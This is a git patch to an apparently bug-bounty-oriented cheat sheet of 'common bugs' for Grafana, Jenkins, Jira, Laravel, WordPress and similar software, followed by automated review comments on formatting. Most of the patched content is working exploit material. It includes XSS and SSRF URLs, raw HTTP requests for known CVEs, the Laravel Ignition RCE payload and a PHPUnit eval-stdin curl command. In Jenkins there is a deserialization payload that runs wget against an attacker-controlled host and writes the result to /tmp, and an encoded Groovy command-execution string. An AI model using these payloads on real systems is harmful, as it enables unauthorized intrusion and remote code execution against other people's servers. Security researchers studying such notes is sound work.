From a0048665a163783f47fae454b0716a490b237e88 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Sat, 18 Jun 2022 20:26:55 +0700 Subject: [PATCH] Adding some 'technology' information --- Technologies/Grafana.md | 10 ++--- Technologies/HAProxy.md | 9 ++++- Technologies/Jenkins.md | 41 +++++++++++++------- Technologies/Jira.md | 78 ++++++++++++++++++++++++++------------- Technologies/Laravel.md | 50 +++++++++++++++++-------- Technologies/Moodle.md | 16 +++++++- Technologies/Nginx.md | 20 +++++++++- Technologies/WordPress.md | 8 ++++ Technologies/Zend.md | 4 +- 9 files changed, 169 insertions(+), 67 deletions(-) diff --git a/Technologies/Grafana.md b/Technologies/Grafana.md index ed6f20c..22bd35a 100644 --- a/Technologies/Grafana.md +++ b/Technologies/Grafana.md @@ -1,16 +1,16 @@ # Grafana 1. CVE-2021-41174 (Reflected XSS) ``` -/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 +https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 ``` 2. CVE-2020-13379 (Denial of Service) ``` -/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D +https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D ``` 3. CVE-2020-11110 (Stored XSS) ``` POST /api/snapshots HTTP/1.1 -Host: +Host: example.com Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} @@ -22,7 +22,7 @@ Connection: close 4. CVE-2019-15043 (Grafana Unauthenticated API) ``` POST /api/snapshots HTTP/1.1 -Host: +Host: example.com Connection: close Content-Length: 235 Accept: */* @@ -37,5 +37,5 @@ Try to login using admin as username and password ``` 6. Signup Enabled ``` -/signup +https://example.com/signup ``` \ No newline at end of file diff --git a/Technologies/HAProxy.md b/Technologies/HAProxy.md index 52ceeb1..3471bd6 100644 --- a/Technologies/HAProxy.md +++ b/Technologies/HAProxy.md 
@@ -1,4 +1,11 @@ -# HAProxy +# HAProxy Common Bugs + +## Introduction +What would you do if you came across a website that uses HAProxy? + +## How to Detect +- + 1. CVE-2021-40346 (HTTP Request Smuggling) ``` POST /index.html HTTP/1.1 diff --git a/Technologies/Jenkins.md b/Technologies/Jenkins.md index f52e3d0..ea44888 100644 --- a/Technologies/Jenkins.md +++ b/Technologies/Jenkins.md @@ -1,5 +1,18 @@ -## Jenkins -1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older) +# Jenkins Common Bugs + +## Introduction +What would you do if you came across a website that uses Jenkins? + +## How to Detect +Usually in the HTTP response there is a header like this `X-Jenkins` + +1. Find the related CVE by checking jenkins version +* How to find the jenkins version + +By checking the response header `X-Jenkins`, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at [pwn_jenkins](https://github.com/gquere/pwn_jenkins) + +Some example CVE: +- Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older) Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload. Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py): @@ -9,7 +22,7 @@ java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.s ./jenkins_rce.py jenkins_ip jenkins_port payload.out ``` -2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1) +- Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1) Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html). 
@@ -18,13 +31,9 @@ If the Jenkins requests authentication but returns valid data using the followin curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a ``` -3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002) - -Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce). - Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc). -4. CVE-2019-1003030 +- CheckScript RCE in Jenkins (CVE-2019-1003030) How to Exploit: - [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html) @@ -56,11 +65,15 @@ to %70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d -5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392) +2. Default Credentials +``` +Try to login using admin as username and password +``` -How to exploit: -- [@jas502n](https://github.com/jas502n/CVE-2019-10392) -- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html) +3. Unauthenticated Jenkins Dashboard +``` +Access https://target.com and if there is no login form then it is vulnerable +``` -Reference: -- https://github.com/gquere/pwn_jenkins \ No newline at end of file +## Reference +* [pwn_jenkins](https://github.com/gquere/pwn_jenkins) \ No newline at end of file diff --git a/Technologies/Jira.md b/Technologies/Jira.md index 291f004..e17d37b 100644 --- a/Technologies/Jira.md +++ b/Technologies/Jira.md 
@@ -1,48 +1,65 @@ -# Unauthenticated Jira CVEs -1. CVE-2017-9506 (SSRF) +# Jira Common Bugs + +## Introduction +What would you do if you came across a website that uses Jira? + +## How to Detect ``` -https:///plugins/servlet/oauth/users/icon-uri?consumerUri= +https://example.com/secure/Dashboard.jspa +https://example.com/login.jsp ``` -2. CVE-2018-20824 (XSS) + +1. Find the related CVE by checking jira version +* How to find the jira version + +Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html) + +Some example CVE: + +- CVE-2017-9506 (SSRF) ``` -https:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) +https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri= ``` -3. CVE-2019-8451 (SSRF) +- CVE-2018-20824 (XSS) ``` -https:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com +https://example.com/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) ``` -4. CVE-2019-8449 (User Information Disclosure) +- CVE-2019-8451 (SSRF) ``` -https:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true +https://example.com/plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com ``` -5. CVE-2019-8442 (Sensitive Information Disclosure) +- CVE-2019-8449 (User Information Disclosure) ``` -https:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml +https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true ``` -6. 
CVE-2019-3403 (User Enumeration) +- CVE-2019-8442 (Sensitive Information Disclosure) ``` -https:///rest/api/2/user/picker?query= +https://example.com/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml ``` -7. CVE-2020-14181 (User Enumeration) +- CVE-2019-3403 (User Enumeration) ``` -https:///secure/ViewUserHover.jspa?username= +https://example.com/rest/api/2/user/picker?query= ``` -8. CVE-2020-14178 (Project Key Enumeration) +- CVE-2020-14181 (User Enumeration) ``` -https:///browse. +https://example.com/secure/ViewUserHover.jspa?username= ``` -9. CVE-2020-14179 (Information Disclosure) +- CVE-2020-14178 (Project Key Enumeration) ``` -https:///secure/QueryComponent!Default.jspa +https://example.com/browse. ``` -10. CVE-2019-11581 (Template Injection) +- CVE-2020-14179 (Information Disclosure) ``` -/secure/ContactAdministrators!default.jspa +https://example.com/secure/QueryComponent!Default.jspa +``` +- CVE-2019-11581 (Template Injection) +``` +example.com/secure/ContactAdministrators!default.jspa * Try the SSTI Payloads ``` -11. CVE-2019-3396 (Path Traversal) +- CVE-2019-3396 (Path Traversal) ``` POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {{Hostname}} 
@@ -56,10 +73,19 @@ Connection: close *Try above request with the Jira target ``` -12. CVE-2019-3402 (XSS) +- CVE-2019-3402 (XSS) ``` -https:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search +https://example.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search ``` -Reference: -- https://twitter.com/harshbothra \ No newline at end of file +2. Signup enabled +``` +POST /servicedesk/customer/user/signup HTTP/1.1 +Host: example.com +Content-Type: application/json + +{"email":"test@gmail.com","signUpContext":{},"secondaryEmail":"","usingNewUi":true} +``` + +## Reference +* [@harshbothra](https://twitter.com/harshbothra) \ No newline at end of file diff --git a/Technologies/Laravel.md b/Technologies/Laravel.md index e4161d0..27a49e1 100644 --- a/Technologies/Laravel.md +++ b/Technologies/Laravel.md 
@@ -1,26 +1,46 @@ -# Common bug in laravel framework -1. Laravel PHPUnit Remote Code Execution -* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -* Affected versions : Before 4.8.28 and 5.x before 5.6.3 +# Laravel Common Bugs -Command +## Introduction +What would you do if you came across a website that uses Laravel? + +## How to Detect +Usually in the HTTP response there is a header like this `Set-Cookie: laravel_session=` + +1. Find the related CVE by checking laravel version +* How to find the laravel version + +By checking the composer file in `https://example.com/composer.json`, sometimes the version is printed there. If you found outdated laravel version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-16542/product_id-38139/Laravel-Laravel.html) + +Some example CVE: + +- CVE-2021-3129 (Remote Code Execution) ``` -curl -d "" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +POST /_ignition/execute-solution HTTP/1.1 +Host: example.com +Accept: application/json +Content-Type: application/json + +{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} ``` -2. Exposed environment variables -* Full Path Exploit : http://target.com/.env +2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841) +``` +curl -d "" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +``` + +3. Exposed environment variables +* Full Path Exploit : http://example.com/.env ![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png) -3. Exposed log files -* Full Path Exploit : http://target.com/storage/logs/laravel.log +4. 
Exposed log files +* Full Path Exploit : http://example.com/storage/logs/laravel.log -4. Laravel Debug Mode Enabled -* Using SQL injection query in GET or POST method -* Try path /logout (ex:target.com/logout) -* Using [] in paramater (ex:target.com/param[]=0) +5. Laravel Debug Mode Enabled +* Try to request to https://example.com using POST method (Error 405) +* Using [] in paramater (ex:example.com/param[]=0) ![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png) -Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html) +## References +* [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html) diff --git a/Technologies/Moodle.md b/Technologies/Moodle.md index bcd6c50..7ebd339 100644 --- a/Technologies/Moodle.md +++ b/Technologies/Moodle.md @@ -1,4 +1,10 @@ -# Moodle +# Moodle Common Bugs + +## Introduction +What would you do if you came across a website that uses Moodle? + +## How to Detect +If you visit `https://target.com` and see the source code, you will see ` ``` + +7. Register enabled +``` +http://example.com/wp-login.php?action=register +``` \ No newline at end of file diff --git a/Technologies/Zend.md b/Technologies/Zend.md index f0d0b5a..048dbe8 100644 --- a/Technologies/Zend.md +++ b/Technologies/Zend.md @@ -1,10 +1,10 @@ -# Common bug in Zend framework +# Zend Common Bugs ## Introduction What would you do if you came across a website that uses Zend? ## How to Detect - +- 1. Finding config files ```
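Review bot: the Grafana hunks replace the empty `Host:` lines with `Host: example.com` but leave `Referer: {{BaseURL}}` in the CVE-2020-11110 request, so one request now mixes a literal example host with a template placeholder; pick a single convention for the whole file, either `example.com` everywhere or the `{{Hostname}}`/`{{BaseURL}}` placeholders that the Jira CVE-2019-3396 request in this same commit already uses.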
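Review bot: the new `## How to Detect` section in HAProxy.md contains only an empty `-` bullet, so the file now advertises detection guidance it does not give; either add the fingerprint the reader is supposed to look for or leave the section out until there is content.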
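Review bot: in the first Jenkins hunk the new detection paragraph is hard to follow: "By checking the response header `X-Jenkins`, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at ..." lowercases Jenkins three times while the heading capitalizes it, and the numbering scheme switches from `1.` to `-` bullets for the CVE list and then resumes with `2.` in a later hunk; use one list style for the items under "Some example CVE" and keep `1.`/`2.`/`3.` for the top-level checks.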
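Review bot: the `@@ -18,13 +31,9 @@` Jenkins hunk deletes the CVE-2019-1003000/1003001/1003002 metaprogramming entry but keeps the line "Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc)", which now sits under the ACL-bypass entry and refers to an "alternative" for a CVE the file no longer mentions; either remove that line together with the entry or keep the entry heading so the sentence has its context.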
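Review bot: the new "Unauthenticated Jenkins Dashboard" item in the last Jenkins hunk says "Access https://target.com and if there is no login form then it is vulnerable", which overstates the finding: anonymous read access is a deliberate, supported authorization setting, and the absence of a login form is only a problem when the anonymous user can do more than read. State what the reader should check beyond the missing login form, and use `example.com` rather than `target.com` as the rest of this commit does. Dropping the Git plugin CVE-2019-10392 entry in the same hunk also deserves a mention in the commit message.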
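Review bot: in the Jira version-detection paragraph the inline code span that should show the line from the Dashboard page source is empty ("You will find this line `` so 8.20.9 is the version jira"), so the reader cannot tell which tag or attribute carries the version; quote the actual line, and reword "is the version jira" to "is the Jira version". In the same hunk the CVE-2019-11581 entry is the only URL without the `https://` scheme (`example.com/secure/ContactAdministrators!default.jspa`).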
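Review bot: the new Jira "Signup enabled" item gives the `POST /servicedesk/customer/user/signup` request but not how to read the result; say which response indicates that customer self-signup is enabled versus disabled so the check is reproducible, and add the `Content-Length` header that the other raw requests in this commit (for example the Grafana CVE-2019-15043 one) include for a JSON body.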
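Review bot: three corrections for the Laravel hunk. First, "How to find the laravel version" points at `https://example.com/composer.json`, but a Laravel application's `composer.json` lives in the project root above the served `public/` directory, so it is not normally reachable, and even when it is exposed it holds a version constraint such as `"laravel/framework": "^9.0"` rather than the installed version, which is recorded in `composer.lock`. Second, the heading `2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841)` attaches the version range to Laravel, whereas the line this hunk removes (`* Affected versions : Before 4.8.28 and 5.x before 5.6.3`) correctly described PHPUnit versions; restore that wording. Third, under "Laravel Debug Mode Enabled", a 405 on `POST https://example.com` is the ordinary Method Not Allowed response regardless of `APP_DEBUG`; what actually indicates debug mode is the detailed error page (stack trace, environment and request data) returned with it, so describe that instead. Also "paramater" is misspelled, and this file uses `## References` while the other files in the commit use `## Reference`.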
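Review bot: the Moodle `How to Detect` sentence uses `https://target.com` where the rest of the commit standardizes on `example.com`, and the inline code span that should show the tell-tale line from the page source ("you will see `") is opened but never closed, so the detection hint is incomplete; quote the line and close the span.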
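Review bot: the WordPress "Register enabled" item is the only URL in the commit written with plain `http://`, and like the Jira signup check it should state what distinguishes the two outcomes: a registration form when registration is enabled versus a redirect with a "registration disabled" notice when it is not.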
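Review bot: in Zend.md the hunk replaces the blank line under `## How to Detect` with a lone `-` bullet, which is still a placeholder with no content; fill it in or drop the section, the same issue as HAProxy.md in this commit.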